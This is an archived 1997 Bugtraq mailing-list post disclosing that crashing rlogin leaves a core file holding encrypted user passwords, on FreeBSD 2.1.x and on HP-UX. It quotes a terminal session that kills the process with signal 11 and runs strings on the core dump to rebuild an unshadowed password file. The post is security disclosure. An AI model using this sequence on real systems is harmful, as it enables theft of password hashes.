Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: FreeBSD,rlogin and coredumps.
From: lerperg () HUSC HARVARD EDU (Michael Lerperger)
Date: Mon, 17 Feb 1997 15:22:10 -0500


This behavior is reproducible on HPUX v9.3 Series 700 machines with the
rlogin cumulative patch PHNE_8805 installed. It was possible to extract
about 265 encrypted user passwords from the core file.

rlogind is disabled now on all HPUX v9.3 systems over here.

-Michael



I tried this technique on my FreeBSD 2.1.0 box. It didn't work. I started
playing around with dump files:

~> rlogin 127.0.0.1
Password:
Last login: Mon Feb 17 00:35:49 from localhost
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
        The Regents of the University of California.   All rights reserved.

FreeBSD 2.1.0-RELEASE (WIPS) #0: Thu Oct 17 03:37:25 SAT 1996

You have new mail.

~> ps -ax | grep rlogin
 6528  ??  S      0:00.06 rlogind
 6527  p1  S+     0:00.05 rlogin 127.0.0.1
 6529  p1  S+     0:00.01 rlogin 127.0.0.1

~> kill -11 6529~> ls
Brain_Box       NS              cronjobs        mail            security
Mail            News            foon            rlogin.core
~>strings rlogin.core > unshadowed.passwdfile.reconstruct
~>vi unshadowed.passwdfile.reconstruct
and reconstruct..

I also tried this on a FreeBSD 2.1.5 box, and it did the same thing. I
wonder if there is a way to make a core dump only readable by root, and why
this isn't the default?




  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]